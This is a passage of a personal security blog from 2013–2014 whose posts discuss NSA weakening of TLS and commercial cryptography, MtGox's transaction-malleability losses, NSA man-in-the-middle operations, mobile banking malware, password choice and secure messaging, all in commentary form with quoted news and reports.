Where it leaves us is in difficulties. We can try and avoid all this stuff by e.g., avoiding American crypto, but it is a bit broader that that. Yes, they attacked and broke some elements of American crypto (and you know what I'm expecting to fall next.). But they also broke the standards process, and that had even more effect on the world.

It has to be said that the IETF security area is now under a cloud. Not only do they need to analyse things back in time to see where it went wrong, but they also need some concept to stop it happening in the future.

The first step however is to actually see the clouds, and admit that rain might be coming soon. May the security AD live in interesting times, borrow my umbrella?

Posted by iang at 11:56 PM | Comments (0) | TrackBack

March 31, 2014

NSA caught again -- deliberate weakening of TLS revealed!?

In a scandal that is now entertaining that legal term of art "slam-dunk" there is news of a new weakness introduced into the TLS suite by the NSA:

We also discovered evidence of the implementation in the RSA BSAFE products of a non-standard TLS extension called "Extended Random." This extension, co-written at the request of the National Security Agency, allows a client to request longer TLS random nonces from the server, a feature that, if it enabled, would speed up the Dual EC attack by a factor of up to 65,000. In addition, the use of this extension allows for for attacks on Dual EC instances configured with P-384 and P-521 elliptic curves, something that is not apparently possible in standard TLS.

This extension to TLS was introduced 3 distinct times through an open IETF Internet Draft process, twice by an NSA employee and a well known TLS specialist, and once by another. The way the extension works is that it increases the quantity of random numbers fed into the cleartext negotiation phase of the protocol. If the attacker has a heads up to those random numbers, that makes his task of divining the state of the PRNG a lot easier. Indeed, the extension definition states more or less that:

4.1. Threats to TLS

When this extension is in use it increases the amount of data that an attacker can inject into the PRF. This potentially would allow an attacker who had partially compromised the PRF greater scope for influencing the output.

The use of Dual_EC, the previously fingered dodgy standard, makes this possible. Which gives us 2 compromises of the standards process that when combined magically work together.

Our analysis strongly suggests that, from an attacker's perspective, backdooring a PRNG should be combined not merely with influencing implementations to use the PRNG but also with influencing other details that secretly improve the exploitability of the PRNG.

Red faces all round.

Posted by iang at 06:12 PM | Comments (0) | TrackBack

March 15, 2014

Update on password management -- how to choose good ones

Spotted in the Cryptogram is something called "the Schneier Method."

So if you want your password to be hard to guess, you should choose something that this process will miss. My advice is to take a sentence and turn it into a password. Something like "This little piggy went to market" might become "tlpWENT2m". That nine-character password won't be in anyone's dictionary. Of course, don't use this one, because I've written about it. Choose your own sentence -- something personal.

Here are some examples:

WIw7,mstmsritt... When I was seven, my sister threw my stuffed rabbit in the toilet.

Wow...doestcst Wow, does that couch smell terrible.

Ltime@go-inag~faaa! Long time ago in a galaxy not far away at all.

uTVM,TPw55:utvm,tpwstillsecure Until this very moment, these passwords were still secure.

You get the idea. Combine a personally memorable sentence with some personally memorable tricks to modify that sentence into a password to create a lengthy password.

This is something which I've also recently taken to using more and more, but I still *write passwords down*.

This isn't a complete solution, as we still have various threats such as losing the paper, forgetting the phrase, or being Miranda'd as we cross the border.

The task here is to evolve to a system where we are reducing our risks, not increasing them. On the whole we need to improve our password creation ability quite dramatically if password crunching is a threat to us personally, and it seems to be the case as more and more sites fall to the NSA-preferred syndrome of systemic security ineptness.

Posted by iang at 08:25 AM | Comments (0) | TrackBack

February 10, 2014

Bitcoin Verification Latency -- MtGox hit by market timing attack, squeezed between the water of impatience and the rock of transactional atomicity

Fresh on the heels of our release of "Bitcoin Verification Latency -- The Achilles Heel for Time Sensitive Transactions" it seems that Mt.Gox has been hit by exactly that - a market timing attack based on latency. In their own words:

Non-technical Explanation:

A bug in the bitcoin software makes it possible for someone to use the Bitcoin network to alter transaction details to make it seem like a sending of bitcoins to a bitcoin wallet did not occur when in fact it did occur. Since the transaction appears as if it has not proceeded correctly, the bitcoins may be resent. MtGox is working with the Bitcoin core development team and others to mitigate this issue.

Technical Explanation:

Bitcoin transactions are subject to a design issue that has been largely ignored, while known to at least a part of the Bitcoin core developers and mentioned on the BitcoinTalk forums. This defect, known as "transaction malleability" makes it possible for a third party to alter the hash of any freshly issued transaction without invalidating the signature, hence resulting in a similar transaction under a different hash. Of course only one of the two transactions can be validated. However, if the party who altered the transaction is fast enough, for example with a direct connection to different mining pools, or has even a small amount of mining power, it can easily cause the transaction hash alteration to be committed to the blockchain.

The bitcoin api "sendtoaddress" broadly used to send bitcoins to a given bitcoin address will return a transaction hash as a way to track the transaction's insertion in the blockchain.
Most wallet and exchange services will keep a record of this said hash in order to be able to respond to users should they inquire about their transaction. It is likely that these services will assume the transaction was not sent if it doesn't appear in the blockchain with the original hash and have currently no means to recognize the alternative transactions as theirs in an efficient way.

This means that an individual could request bitcoins from an exchange or wallet service, alter the resulting transaction's hash before inclusion in the blockchain, then contact the issuing service while claiming the transaction did not proceed. If the alteration fails, the user can simply send the bitcoins back and try again until successful.

Which all means what? Well, it seems that while waiting on a transaction to pop out of the block chain, one can rely on a token to track it. And so can ones counterparty. Except, this token was not exactly constructed on a security basis, and the initiator of the transaction can break it, leading to two naive views of the transaction. Which leads to some game-playing.

Let's be very clear here. There are three components to this break: Latency, impatience, and a bad token. Latency is the underlying physical problem, also known as the coordination problem or the two-generals problem. At a deeper level, as latency on a network is a physical certainty limited by the speed of light, there is always an open window of opportunity for trouble when two parties are trying to agree on anything.

In fast payment systems, that window isn't a problem for humans (as opposed to algos), as good payment systems clear in less than a second, sometimes known as real time. But not so in Bitcoin; where the latency is from 5 minutes and up to 120 depending on your assumptions, which leaves an unacceptable gap between the completion of the transaction and the users' expectations. Hence the second component: impatience.

The 'solution' to the settlement-impatience problem then is the hash token that substitutes as a final (triple entry) evidentiary receipt until the block-chain settles. This hash or token used in Bitcoin is broken, in that it is not cryptographically reliable as a token identifying the eventual settled payment.

Obviously, the immediate solution is to fix the hash, which is what Mt.Gox is asking Bitcoin dev team to do. But this assumes that the solution is in fact a solution. It is not. It's a hack, and a dangerous one. Let's go back to the definition of payments, again assuming the latency of coordination.

A payment is initiated by the controller of an account. That payment is like a cheque (or check) that is sent out. It is then intermediated by the system. Which produces the transaction.

But as we all know with cheques, a controller can produce multiple cheques. So a cheque is more like a promise that can be broken. And as we all know with people, relying on the cheque alone isn't reliable enough by and of itself, so the system must resolve the abuses. That fundamental understanding in place, here's what Bitcoin Foundation's Gavin Andresen said about Mt.Gox:

The issues that Mt. Gox has been experiencing are due to an unfortunate interaction between Mt. Gox’s implementation of their highly customized wallet software, their customer support procedures, and their unpreparedness for transaction malleability, a technical detail that allows changes to the way transactions are identified.

Transaction malleability has been known about since 2011. In simplest of terms, it is a small window where transaction ID’s can be “renamed” before being confirmed in the blockchain. This is something that cannot be corrected overnight. Therefore, any company dealing with Bitcoin transactions and have coded their own wallet software should responsibly prepare for this possibility and include in their software a way to validate transaction ID’s. Otherwise, it can result in Bitcoin loss and headache for everyone involved.

Ah. Oops. So it is a known problem. So one could make a case that Mt.Gox should have dealt with it, as a known bug.

But note the language above... Transaction malleability? That is a contradiction in terms. A transaction isn't malleable, the very definition of a transaction is that it is atomic, it is or it isn't. ACID for those who recall the CS classes: Atomic, consistent, independent, durable.

Very simply put, that which is put into the beginning of the block chain calculation cycle /is not a transaction/ whereas that which comes out, is, assuming a handwavy number of 10m cycles such as 6. Therefore, the identifier to which they speak cannot be a transaction identifier, by definition. It must be an identifier to ... something else!

What's happening here then is more likely a case of cognitive dissonance, leading to a regrettable and unintended deception. Read Mt.Gox's description above, again, and the reliance on the word becomes clearer. Users have known to demand transactions because we techies taught them that transactions are reliable, by definition; Bitcoin provides the word but not the act.

So the first part of the fix is to change the words back to ones with reliable meanings. You can't simply undefine a term that has been known for 40 years, and expect the user community to follow.

(To be clear, I'm not suggesting what the terms should be. In my work, I simply call what goes in a 'Payment', and what comes out a 'Receipt'. The latter Receipt is equated to the transaction, and in my lesson on triple entry, I often end with a flourish: The Receipt is the Transaction. Which has more poetry if you've experienced transactional pain before, and you've read the whole thing. We all have our dreams :)

We are still leaves the impatience problem.

Note that this will also affect any other crypto-currency using the same transaction scheme as Bitcoin.

Conclusion
To put things in perspective, it's important to remember that Bitcoin is a very new technology and still very much in its early stages. What MtGox and the Bitcoin community have experienced in the past year has been an incredible and exciting challenge, and there is still much to do to further improve.

When we did our early work in this, we recognised that the market timing attack comes from the implicit misunderstanding of how latency interferes with transactions, and how impatience interferes with both of them. So in our protocols, there is no 'token' that is available to track a pending transaction. This was a deliberate, early design decision, and indeed the servers still just dump and ignore anything they don't understand in order to force the clients away from leaning on unreliable crutches.

It's also the flip side of the triple-entry receipt -- its existence is the full evidence, hence, the receipt is the transaction. Once you have the receipt, you're golden, if not, you're in the mud.

But Bitcoin had a rather extraordinary problem -- the distribution of its consensus on the transaction amongst any large group of nodes that wanted to play. Which inherently made transactional mechanics and latency issues blow out. This is a high price to pay, and only history is going to tell us whether the price is too high or affordable.

Posted by iang at 07:36 AM | Comments (1) | TrackBack

December 30, 2013

MITMs conducted by the NSA - 50% success rate

One of the complaints against the SSL obesity security model was that all the blabber of x.509/CAs was there to protect against the MITM (man-in-the-middle) attack. But where was this elusive beast?

Now we have evidence. In the recent Der Spiegel article about the NSA's hacking catalogue, it is laid out pretty comprehensively:

A Race Between Servers

Once TAO teams have gathered sufficient data on their targets' habits, they can shift into attack mode, programming the QUANTUM systems to perform this work in a largely automated way. If a data packet featuring the email address or cookie of a target passes through a cable or router monitored by the NSA, the system sounds the alarm. It determines what website the target person is trying to access and then activates one of the intelligence service's covert servers, known by the codename FOXACID.

This NSA server coerces the user into connecting to NSA covert systems rather than the intended sites. In the case of Belgacom engineers, instead of reaching the LinkedIn page they were actually trying to visit, they were also directed to FOXACID servers housed on NSA networks. Undetected by the user, the manipulated page transferred malware already custom tailored to match security holes on the target person's computer.

The technique can literally be a race between servers, one that is described in internal intelligence agency jargon with phrases like: "Wait for client to initiate new connection," "Shoot!" and "Hope to beat server-to-client response." Like any competition, at times the covert network's surveillance tools are "too slow to win the race." Often enough, though, they are effective. Implants with QUANTUMINSERT, especially when used in conjunction with LinkedIn, now have a success rate of over 50 percent, according to one internal document.

We've seen some indication that wireless is used for MITMs, but it is a difficult attack, as it requires physical presence. Phishing is an MITM, and has been in widespread use, but like apocyphal saying from Star Wars, these MITMs "aren't the droids you're looking for." Or so say the security experts behind web encryption standards.

This one is the droid we're looking for. A major victim is identified, serious assets are listed, secondary victims, procedures, codenames, the whole works. This is an automated, industrial-scale attack, something that breaches the normal conceptual boundaries of what an MITM looks like. We can no longer assume that MITMs are too expensive for mass use. Their economic applicability is presumably enabled the NSA operates a shadow network, capable of attacking the nodes in ours:

The insert method and other variants of QUANTUM are closely linked to a shadow network operated by the NSA alongside the Internet, with its own, well-hidden infrastructure comprised of "covert" routers and servers. It appears the NSA also incorporates routers and servers from non-NSA networks into its covert network by infecting these networks with "implants" that then allow the government hackers to control the computers remotely.

Tantalising stuff for your inner geek! So it seems we now do need protection against the the MITM, in the form of the NSA. For real work, and also for Facebook, LinkedIn and other entertainment sites because of their universality as an attack vector. But will SSL provide that? In the short term and for easier cases, yes. But not completely, because most set-ups are ill-equiped to deal with attacks at an aggressive level. Until the browser starts mapping the cert to the identity expected, something we've been requesting for a decade now, it just won't provide much defence.

Certificate pinning is coming, but so is Christmas, DNSSec, IPv6 and my guaranteed anti-unicorn pill. By the time certificate pinning gets here, the NSA will likely have exfiltrated every important site's keys or bought off the right CA so it doesn't matter anyway.

One question remains: is this a risk? to us?

In the old Security World, we always said we don't consider the NSA a risk to us, because they never reveal the data (unless we're terrorists or drug dealers or commies or Iranians, in which case we know we're fair game).

That no longer holds true. The NSA shares data with every major agency in the USA that has an interest. They crossed the line that cannot be crossed, and the rot of ML seizure corruption, economic espionage and competitive intervention means that the NSA is now as much a threat to everyone as any other attacker.

Every business that has a competitor in USA. Every department that has a negotiation with a federal agency. Every individual that has ever criticised the status quo on the Internet. We're all at risk, now.

Oh, to live in interesting times.

Posted by iang at 01:39 AM | Comments (0) | TrackBack

December 24, 2013

MITB defences of dual channel -- the end of a good run?

Back in 2006 Philipp Gühring penned the story of what had been discovered in European banks, in what has now become a landmark paper in banking security:

A new threat is emerging that attacks browsers by means of trojan horses. The new breed of new trojan horses can modify the transactions on-the-fly, as they are formed in in browsers, and still display the user's intended transaction to her. Structurally they are a man-in-the-middle attack between the the user and the security mechanisms of the browser. Distinct from Phishing attacks which rely upon similar but fraudulent websites, these new attacks cannot be detected by the user at all, as they are use real services, the user is correctly logged-in as normal, and there is no difference to be seen.

This was quite scary. The European banks had successfully migrated their user bases across to the online platform and were well on the way to reducing branch numbers. Fantastic cost reductions... But:

The WYSIWYG concept of the browser is successfully broken. No advanced authentication method (PIN, TAN, iTAN, Client certificates, Secure-ID, SmartCards, Class3 Readers, OTP, ...) can defend against these attacks, because the attacks are working on the transaction level, not on the authentication level. PKI and other security measures are simply bypassed, and are therefore rendered obsolete.

If they saw any reduction in use of web banking, and the load shift back to branch, they were in a world of pain --- capacity had shrunk.

The conclusion that the European banks came to, once they'd got over their initial fears, was that phones could be used to do SMS transaction authorisations. This system was rolled out over the next couple of years, and it more or less took the edge off the MITB.

Now comes news NSS Labs' Ken Baylor that the malware authors have developed two channel attacks:

On the positive side, there has been little innovation in the functionality of mobile financial malware in the last 24 months, and the iOS platform appears secure; however, further analysis reveals that there are now multiple mobile malware suites capable of defeating bank multifactor authentication. With 99 percent of new mobile malware targeting Android, attacks on this platform are unprecedented both in their number and their impact. The lack of iOS malware is likely related to the low availability of iOS malware developers in the ex-Soviet Republic.

While banks remain slow to evolve their mobile security strategies, they will find the cyber criminals are several steps ahead of them.

Malware now tries to mount an attack on both channels. This occurs thus-ways:

Zeus and other MITB trojans have used social engineering to bypass this process. When a user on an infected PC authenticates to a banking site using SMS authentication, the user is greeted by a webinject, similar to Figure 1. The webinject requires the installation of new software on the user’s mobile device; this software is in fact malware.

ZitMo malware intercepts SMS TANs from the bank. Once greeted by the webinject on a Zeus-infected PC, the user enrolls by entering a phone number. A “security update” link is sent to the phone, and ZitMo installs when the link is clicked. Any bank SMS messages are redirected to a cyber criminal’s phone (all other SMS messages will be delivered as normal).

We knew at the time that this could occur, but it seemed unlikely. (I say 'we' to mean that I was mostly an observer; at the time I was in Vienna and was at the periphery of some of these groups. However, my lack of German made any contributions rather erratic.)

Unlikely because on the first hand it seemed an inordinate amount of complexity, and on the other, there wasn't enough of a target. What changed? The market has shifted hugely over to mobile use as opposed to web use. The Americans have been a bit slower, but now their on a roll:

According to the Pew Research Center,1 mobile banking usage has jumped from 24 percent of the US adult population in April 2012 to 35 percent in May 2013. Banks have encouraged this move toward mobile banking. Most banks began offering mobile services with a simple redirect to a mobile site (with limited functionality) upon detection of smartphone HTTP headers; others created mobile apps with HTML wrappers for a better user experience and more functionality. As yet, only a few have built secure native apps for each platform.

Many banks believe that mobile devices are a secure secondary method of authentication. To authenticate the widest number of people who have phones (rather than just smartphones), many built their second factor authentication solutions on one of the most widely available (although insecure) protocols: short message services (SMS). As banks believed an SMS-authenticated customer was more secure than a PC-based user, they enabled the former to carry out riskier transactions. Realizing the rewards awaiting those able to circumvent SMS authentication, criminals quickly developed mobile malware.

So the convenient second channel of the phone has actually switched places: it's the primary channel, it's life, and the laptop is relegated to the at-office, at-home work slave. The model has been turned upside down, and in the things that fell out of the pockets, the security also took a tumble.

Closing with Ken Baylor's recommendations:

NSS Labs Recommendations
  • Understand and account for current mobile malware strategies when developing mobile banking apps.
  • Do not rely on SMS-based authentication; it has been thoroughly compromised.
  • Retire HTML wrapper mobile banking apps and replace them with secure native mobile apps where feasible. These apps should include a combination of hardened browsers, certificate-based identification, unique install keys, in-app encryption, geolocation, and device fingerprinting.


Hey! I guess that's the business I'm in now. We've successfully ported the 'mature' Ricardo platform to Android: No flaky browsers in sight, and our auth strategy is a real strategy, not that old certificate-based snake-oil. Obviously, public keys and in-app encryption.

Geolocation and device fingerprinting I am yet to add. But that's easy enough later on. I guess I should post on all this some time, if anyone is interested...

Posted by iang at 03:40 AM | Comments (1) | TrackBack

November 10, 2013

The NSA will shape the worldwide commercial cryptography market to make it more tractable to...

In the long running saga of the Snowden revelations, another fact is confirmed by ashkan soltani. It's the last point on this slide showing some nice redaction minimisation.

In words:

(U) The CCP expects this Project to accomplish the following in FY 2013:
  • ...
  • (TS//SI//NF) Shape the worldwide commercial cryptography marketplace to make it more tractable to advanced cryptanalytic capabilities being developed by NSA/CSS. [CCP_00090]

Confirmed: the NSA manipulates the commercial providers of cryptography to make it easier to crack their product. When I said, avoid American-influenced cryptography, I wasn't joking: the Consolidated Cryptologic Program (CCP) is consolidating access to your crypto.

Addition: John Young forwarded me the original documents (Guardian and NYT) and their blanket introduction makes it entirely clear:

(TS//SI//NF) The SIGINT Enabling Project actively engages the US and foreign IT industries to covertly influence and/or overtly leverage their commercial products' designs. These design changes make the systems in question exploitable through SIGINT collection (e.g., Endpoint, MidPoint, etc.) with foreknowledge of the modification. ....

Note also that the classification for the goal above differs in that it is NF -- No Foreigners -- whereas most of the other goals listed are REL TO USA, FVEY which means the goals can be shared with the Five Eyes Intelligence Community (USA, UK, Canada, Australia, New Zealand).

The more secret it is, the more clearly important is this goal. The only other goal with this level of secrecy was the one suggesting an actual target of sensitivity -- fair enough. More confirmation:

(U) Base resources in this project are used to:
  • (TS//SI//REL TO USA, FVEY) Insert vulnerabilities into commercial encryption systems, IT systems, networks and endpoint communications devices used by targets.
  • ...

and in goals 4, 5:

  • (TS//SI//REL TO USA, FVEY) Complete enabling for [XXXXXX] encryption chips used in Virtual Private Network and Web encryption devices. [CCP_00009].
  • (TS//SI//REL TO USA, FVEY) Make gains in enabling decryption and Computer Network Exploitation (CNE) access to fourth generation/Long Term Evolution (4GL/LTE) networks via enabling. [CCP_00009]

Obviously, we're interested in the [XXXXXX] above. But the big picture is complete: the NSA wants backdoor access to every chip used for encryption in VPNs, wireless routers and the cell network.

This is no small thing. There should be no doubt now that the NSA actively looks to seek backdoors in any interesting cryptographic tool. Therefore, the NSA is numbered amongst the threats, and so are your cryptographic providers, if they are within reach of the NSA.

Granted that other countries might behave the same way. But the NSA has the resources, the will, the market domination (consider Microsoft's CAPI, Java's Cryptography Engine, Cisco & Juniper on routing, FIPS effect on SSL, etc) and now the track record to make this a more serious threat.

Posted by iang at 06:48 AM | Comments (0) | TrackBack

November 01, 2013

NSA v. the geeks v. google -- a picture is worth a thousand cribs

Dave Cohen says: "I wonder if I have what it takes to make presentations at the NSA."

H/t to Jeroen. So I wonder if the Second World Cryptowars are really on?

Our Mission

To bring the world our unique end-to-end encrypted protocol and architecture that is the 'next-generation' of private and secure email. As founding partners of The Dark Mail Alliance, both Silent Circle and Lavabit will work to bring other members into the alliance, assist them in implementing the new protocol and jointly work to proliferate the worlds first end-to-end encrypted 'Email 3.0' throughout the world's email providers. Our goal is to open source the protocol and architecture and help others implement this new technology to address privacy concerns against surveillance and back door threats of any kind.

Could be. In the context of the new google sniffing revelations, it may now be clearer how the NSA is accessing all of the data of all of the majors. What do we think about the NSA? Some aren't happy, like Kenton Varda:

If the NSA is indeed tapping communications from Google's inter-datacenter links then they are almost certainly using the open source protobuf release (i.e. my code) to help interpret the data (since it's almost all in protobuf format). Fuck you, NSA.

What about google? Some outrage from the same source:

I had to admit I was shocked by one thing: I'm amazed Google is transmitting unencrypted data between datacenters.

is met with Varda's comment:

We're (I think) talking about Google-owned fiber between Google-owned endpoints, not shared with anyone, and definitely not the public internet. Physically tapping fiber without being detected is pretty difficult and a well-funded state-sponsored entity is probably the only one that could do it.

Ah. So google did some risk analysis and thought this was one they can pass on. Google's bad. A bit of research shows BlackHat in 2003:

  • Commercially available taps are readily available that produce an insertion loss of 3 dB which cost less than $1000!
  • Taps currently in use by state-sponsored military and intelligence organizations have insertion losses as low as 0.5 dB!
  • That document indicates 2001 published accounts of NSA tapping fibre, and I found somewhere a hint that it was first publically revealed in 1999. I'm pretty sure we knew about the USS Jimmy Carter back then, although my memory fades...

    So maybe Google thought it hard to tap fibre, but actually we've known for over a decade that is not so. Google's bad, they are indeed negligent. Jeroen van Gelderen says:

    Correct me if I'm wrong but you promise that "[w]e restrict access to personal information to Google employees, contractors and agents who need to know that information in order to process it for us, and who are subject to strict contractual confidentiality obligations and may be disciplined or terminated if they fail to meet these obligations.

    Indeed, as a matter of degree, I would say google are grossly negligent: the care that they show for physical security at their data centers, and all the care that they purport in other security matters, was clearly not shown once the fiber left their house.

    Meanwhile, given the nature of the NSA's operations, some might ask (as Jeroen does):

    Now that you have been caught being utterly negligent in protecting customer data, to the point of blatantly violating your own privacy policies, can you please tell us which of your senior security people were responsible for downplaying the risk of your thousands of miles of unsecured, easily accessible fibers being tapped? Have they been fired yet?

    Chances of that one being answered are pretty slim. I can imagine Facebook being pretty relaxed about this. I can sort of see Apple dropping the ball on this. I'm not going to spare any time with Microsoft, who've been on the contract teet since time immemorial.

    But google? That had security street cred? Time to call a spade a spade: if google are not analysing and revealing how they came to miss these known and easy threats, then how do we know they aren't conspirators?

    Posted by iang at 01:34 PM | Comments (1) | TrackBack

    October 31, 2013

    Why the NSA loves the one-security-model HTTPS fanaticism of the Internet

    Of all the things I have written about the traps in the HTTPS model for security, this one diagram lays it out so well, I'm left in the dirt. Presented with little comment:

    The National Security Agency has secretly broken into the main communications links that connect Yahoo and Google data centers around the world, according to documents obtained from former NSA contractor Edward Snowden and interviews with knowledgeable officials.

    By tapping those links, the agency has positioned itself to collect at will from hundreds of millions of user accounts, many of them belonging to Americans. The NSA does not keep everything it collects, but it keeps a lot.

    Read all of the stories in The Washington Post's ongoing coverage of the National Security Agency's surveillance programs.

    According to a top-secret accounting dated Jan. 9, 2013, the NSA's acquisitions directorate sends millions of records every day from internal Yahoo and Google networks to data warehouses at the agency's headquarters at Fort Meade, Md. In the preceding 30 days, the report said, field collectors had processed and sent back 181,280,466 new records -- including "metadata," which would indicate who sent or received e-mails and when, as well as content such as text, audio and video.

    ...

    Posted by iang at 04:54 AM | Comments (0) | TrackBack

    October 29, 2013

    Confirmed: the US DoJ will not put the bankers in jail, no matter how deep the fraud

    I've often asked the question why no-one went to jail for the frauds of the financial crisis, and now the US government has answered it: they are complicit in the cover-up, which means that the financial rot has infected the Department of Justice as well. Bill Black writes about the recent Bank of America verdict:

    The author of the most brilliantly comedic statement ever written about the crisis is Landon Thomas, Jr. He does not bury the lead. Everything worth reading is in the first sentence, and it should trigger belly laughs nationwide.

    Bank of America, one of the nation’s largest banks, was found liable on Wednesday of having sold defective mortgages, a jury decision that will be seen as a victory for the government in its aggressive effort to hold banks accountable for their role in the housing crisis."

    “The government,” as a statement of fact so indisputable that it requires neither citation nor reasoning, has been engaged in an “aggressive effort to hold banks accountable for their role in the housing crisis.” Yes, we have not seen such an aggressive effort since Captain Renault told Rick in the movie Casablanca that he was “shocked” to discover that there was gambling going on (just before being handed his gambling “winnings” which were really a bribe).

    There are four clues in the sentence I quoted that indicate that the author knows he’s putting us on, but they are subtle. First, the case was a civil case. “The government’s” “aggressive effort to hold banks accountable” has produced – zero convictions of the elite Wall Street officers and banks whose frauds drove the crisis. Thomas, of course, knows this and his use of the word “aggressive” mocks the Department of Justice (DOJ) propaganda. The jurors found that BoA (through its officers) committed an orgy of fraud in order to enrich those officers. That is a criminal act. Prosecutors who are far from “aggressive” prosecute elite frauds criminally because they know it is essential to deter fraud and safeguard our financial system. The DOJ refused to prosecute the frauds led by senior BoA officers. The journalist’s riff is so funny because he portrays DOJ’s refusal to prosecute frauds led by elite BoA officers as “aggressive.” Show the NYT article to friends you have who are Brits and who claim that Americans are incapable of irony. The article’s lead sentence refutes that claim for all time.

    The twin loan origination fraud epidemics (liar’s loans and appraisal fraud) and the epidemic of fraudulent sales of the fraudulently originated mortgages to the secondary market would each – separately – constitute the most destructive frauds in history. These three epidemics of accounting control fraud by loan originators hyper-inflated the real estate bubble and drove our financial crisis and the Great Recession. By way of contrast, the S&L debacle was less than 1/70 the magnitude of fraud and losses than the current crisis, yet we obtained over 1,000 felony convictions in cases DOJ designated as “major.” If DOJ is “aggressive” in this crisis what word would be necessary to describe our approach?

    Read on for the details of how Bill Black forms his conclusion.

    Posted by iang at 05:27 AM | Comments (0) | TrackBack

    September 05, 2013

    The OODA thought cycle of the security world is around a decade -- Silent Circle releases a Secure Chat that deletes messages

    According to the record, I first started talking publically about this problem it seems in 2004, 9 years ago, in a post exchange with Bill Stewart:

    Bill Stewart wrote:
    > I don't understand the threat model here. The usual models are ...
    > - Recipient's Computer Disk automatically backed up to optical storage at night
    > - No sense subpoenaing cyphertext when you can subpoena plaintext.

    In terms of threats actually seen in the real world
    leading to costs, etc, I would have thought that the
    subpoena / civil / criminal case would be the largest.
    ...

    In summary, one of the largest threats to real people out there is that things said in the haste of the moment come back to haunt them. So I wanted a crypto-chat system that caused the messages to disappear:

    At 07:54 AM 9/17/2004, Ian Grigg wrote:
    >Ahhhh, now if one could implement a message that self-
    >destructed on the recipient's machine, that would
    >start to improve security against the above outlined
    >threat.

    Think about the Arthur Anderson 'document destruction policy' memo, or as Bill goes on to list:

    That's been done, by "Disappearing Inc". www.disappearing.com/ says they're now owned by Omniva. ... The system obviously doesn't stop the recipient from screen-scraping the message (don't remember if it supported cut&paste), but it's designed for the Ollie North problem
    "What do you mean the email system backs up all messages
    on optical disk? I thought I deleted the evidence!"
    or the business equivalent (anti-trust suit wants all your correspondence from the last 17 years.)

    OK, so those are bad guys, and why would we want to sell our services to them? Hopefully, they are too small a market to make a profit (and if not, we're in more trouble than we thought,,).

    No, I'm really thinking about the ordinary people, not the Ollie Norths of the world. The headline example here is the messy divorce, where SBTX drags out every thing you said romantically and in frustration over secure chat from 10 years ago. It's a real problem, and companies have tried to solve it:

    However what gets interesting is when the sparks of anger not romance fly:

    If a couple breaks up, one of them may disconnect the service and all the data will be deleted.

    But none of these have credibility of the security industry. They're all like Kim-dotcom efforts, which aim at serious problems, but fail to get to the real end.

    Now, thankfully a company with serious security credibility has release a solution:

    WASHINGTON, D.C. – September 3, 2013 – Silent Circle, the global encrypted communications firm revolutionizing mobile device security for organizations and individuals alike, today announced the availability of its Silent Text secure messaging and file transfer app for Android devices via Google Play. With the addition of Silent Text for Android, Silent Circle's apps and services offer unmatched privacy protection by routing encrypted calls, messages and attachments exclusively between Silent Circle users' iOS and Android devices without logging metadata associated with subscribers' communications.

    Silent Text for Android's features include:

    • Burn Notice feature allows you to have any messages you send self-destruct after a time delay

    • ...

    [Jon Callas:] "Beyond strong encryption, our apps give users important, additional privacy controls, such as Silent Text's ability to wipe messages and files from a recipient's device with a 'Burn Notice.'"

    Fantastic! We may not like the rest of Silent Circle's products or solutions, but finally we have serious cryptoplumbers deploying a really needed feature. Back to me, back to 2004:

    As this threat is real, persistent and growing in popularity, the obsession of perfectly covering more crypto-savvy threats seems .. unbalanced?

    Which leaves me wondering why it took so long to get the attention of the serious industry? This above quote measures the OODA loop in security threat thinking at around 9 years, so a decade, as opposed to quicker in-protocol threats. Which scarily matches the time it took to deploy TLS/SNI. And the time it is taking from phishing threat identification (around 2003) to understanding that HTTPS Everywhere was part of the solution (2005) to deployment of HTTPS Everywhere (2012++).

    Why does the security industry clutch so fiercely to its quaint old notions of CIA as received wisdom and security done because we can do it? A partial answer is that we are simply bad at risk. Our society and by extension the so-called security industry cannot handle risk management, and instead chases headline threats and bogeymen, as Bruce Schneiers laments:

    We need to relearn how to recognize the trade-offs that come from risk management, especially risk from our fellow human beings. We need to relearn how to accept risk, and even embrace it, as essential to human progress and our free society. The more we expect technology to protect us from people in the same way it protects us from nature, the more we will sacrifice the very values of our society in futile attempts to achieve this security.

    He's hitting most of the bases there: risks from and to people, rather than dusty cold-war cryptographic textbooks; the technician's desire to eliminate risks 'perfectly' and ignore those he can't deal with; the adulation given to exotic technical solutions /versus/ the avoidance of risk as opportunity.

    There is more: our inability to feel and measure risk accurately means we are susceptible to the dollar-incentivised snake-oil salesmen. Which leads to, liability and responsibility problems in what is termed the agency problem: we used to say that nobody ever got fired for buying IBM. During the 1990s, nobody ever got fired for implementing SSL.

    In the 2000s, nobody ever got fired for increasing the budget for Homeland Security.

    In the 2010s it seems, nobody will ever get fired for cyberwarfare. We continue as a society to be better at creating more risks for ourselves in the name of threats.

    Posted by iang at 05:02 AM | Comments (2) | TrackBack

    July 30, 2013

    The NSA is lying again -- how STOOPID are we?

    In the on-going tits-for-tat between the White House and the world (Western cyberwarriors versus Chinese cyberspies; Obama and will-he-won't he scramble his forces to intercept a 29 year old hacker who is-flying-isn't-flying; the ongoing search for the undeniable Iranian cassus belli, the secret cells in Apple and Google that are too secret to be found but no longer secret enough to be denied), and one does wonder...

    Who can we believe on anything? Here's a data point. This must be the loudest YOU-ARE-STOOPID response I have ever seen from a government agency to its own populace:

    The National Security Agency lacks the technology to conduct a keyword search of its employees’ emails, even as it collects data on every U.S. phone call and monitors online communications of suspected terrorists, according to NSA’s freedom of information officer.

    “There’s no central method to search an email at this time with the way our records are set up, unfortunately,” Cindy Blacker told a reporter at the nonprofit news website ProPublica.

    Ms. Blacker said the agency’s email system is “a little antiquated and archaic,” the website reported Tuesday.

    One word: counterintelligence. The NSA is a spy agency. It has a department that is mandated to look at all its people for deviation from the cause. I don't know what it's called, but more than likely there are actually several departments with this brief. And they can definately read your email. In bulk, in minutiae, and in ways we civilians can't even conceive.

    It is standard practice at most large organizations — not to mention a standard feature of most commercially available email systems — to be able to do bulk searches of employees’ email as part of internal investigations, discovery in legal cases or compliance exercises.

    The claim that the NSA cannot look at its own email system is either a) a declaration of materially aiding the enemy by not completing its necessary and understood role of counterintelligence (in which case it should be tried in a military court, being wartime, right?), or b) a downright lie to a stupid public.

    I'm inclined to think it's the second (which leaves a fascinating panopoly of civilian charges). In which case, one wonders just how STOOPID the people governing the NSA are? Here's another data point:

    The numbers tell the story — in votes and dollars. On Wednesday, the House voted 217 to 205 not to rein in the NSA’s phone-spying dragnet. It turns out that those 217 “no” voters received twice as much campaign financing from the defense and intelligence industry as the 205 “yes” voters.

    .... House members who voted to continue the massive phone-call-metadata spy program, on average, raked in 122 percent more money from defense contractors than those who voted to dismantle it.

